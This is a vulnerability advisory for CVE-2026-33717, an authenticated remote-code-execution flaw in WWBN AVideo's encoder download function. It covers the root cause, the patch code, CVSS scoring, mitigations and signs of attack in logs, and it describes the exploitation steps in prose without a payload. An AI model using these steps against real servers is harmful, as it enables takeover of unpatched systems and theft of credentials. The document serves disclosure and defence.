CVE-2026-33717: Remote Code Execution in WWBN AVideo via Persistent PHP File Upload

WWBN AVideo up to version 26.0 contains a high-severity vulnerability (CVE-2026-33717) allowing authenticated attackers to execute arbitrary code. The flaw resides in the file download functionality utilized by the video encoder module.

The application fetches remote files specified by user-supplied URLs and stores them locally in a web-accessible cache directory. It performs file type validation operations after writing the file to disk rather than before.

A specific error-handling logic flaw allows attackers to force the script to terminate prematurely before the temporary file is deleted. This failure to execute cleanup routines leaves the malicious payload permanently accessible via the web server.

The underlying bug class is CWE-434: Unrestricted Upload of File with Dangerous Type, combined with improper error handling. The vulnerable function downloadVideoFromDownloadURL() within objects/aVideoEncoder.json.php processes user-supplied download URLs.

When a user requests a remote download, the server immediately writes the contents of the remote file into the videos/cache/tmpFile/ directory. The application uses the original filename and extension derived from the URL via the PHP basename() function. No initial validation restricts the file extension during this initial write operation.

Following the file write, the application evaluates the user-supplied resolution parameter. If the parameter contains an invalid string, the application invokes the forbiddenPage() function. This function executes a die() statement, abruptly terminating the PHP process.

Because the script exits prematurely, the execution flow never reaches the cleanup routines responsible for moving or deleting the temporary file. The lack of cleanup renders the downloaded file persistent within the web-accessible directory.

The vulnerable implementation relies entirely on post-download validation. The script downloads the file to the temporary directory and subsequently validates parameters like the video resolution. If validation fails, process termination prevents file cleanup.

The official patch addresses this by reordering the validation logic and implementing an explicit extension allowlist. Input validation now occurs prior to any file I/O operations.

// File: objects/aVideoEncoder.json.php
// 1. Move resolution validation to before the download
if (!empty($_REQUEST['resolution']) && !in_array($_REQUEST['resolution'], $global['avideo_possible_resolutions'])) {
    $msg = "This resolution is not possible {$_REQUEST['resolution']}";
    forbiddenPage($msg); // die() here is now safe because no file is created yet
}
 
// 2. Validate extension inside download function
function downloadVideoFromDownloadURL($downloadURL) {
    // ...
    $urlExtension = strtolower(pathinfo(parse_url($downloadURL, PHP_URL_PATH), PATHINFO_EXTENSION));
    if (!in_array($urlExtension, $global['allowedExtension'])) {
        __errlog("Extension not allowed: " . $urlExtension);
        return false;
    }
    // ... proceed to download
}

The implementation of in_array($urlExtension, $global['allowedExtension']) ensures that only explicitly permitted file types are written to disk, comprehensively eliminating the CWE-434 vector.

Exploitation requires a user account with minimal privileges, specifically standard user or encoder permissions. The attacker needs secondary server infrastructure to host the initial payload.

The attacker hosts a malicious PHP script on their controlled infrastructure. They then transmit a direct request to the objects/aVideoEncoder.json.php endpoint on the target AVideo server.

The request must contain two specific parameters: a downloadURL pointing to the malicious PHP script and a resolution parameter containing an explicitly invalid value. The target server fetches the PHP file and writes it to the videos/cache/tmpFile/ directory.

The invalid resolution parameter forces the application to evaluate the input and call forbiddenPage(). The script aborts, leaving the PHP file in the temporary directory. The attacker subsequently accesses the file via a predictable URL path to achieve code execution.

Successful exploitation yields arbitrary remote code execution within the context of the web server service account. This grants the attacker comprehensive control over the application environment and direct filesystem access.

The attacker gains read and write access to the application database credentials, configuration files, and stored media. This constitutes a complete loss of confidentiality and integrity according to the CVSS v3.1 scoring framework.

The vulnerability carries a CVSS v3.1 base score of 8.8. The attack complexity is low, and no user interaction is required. The requirement for low-level authentication prevents this vulnerability from reaching a 9.8 critical severity rating.

Organizations operating WWBN AVideo must upgrade to version 26.1 or later. The patch completely eliminates the vulnerability by validating input before allocating storage and strictly limiting allowed file extensions.

If immediate patching is not technically feasible, administrators can apply mitigation controls at the web server layer. Configuring Nginx or Apache to deny execution of PHP scripts within the /videos/cache/ directory structure neutralizes the exploit.

Administrators should monitor web server access logs for anomalous requests to objects/aVideoEncoder.json.php. Requests featuring unusual or malformed resolution parameters alongside remote downloadURL inputs strongly indicate exploitation attempts.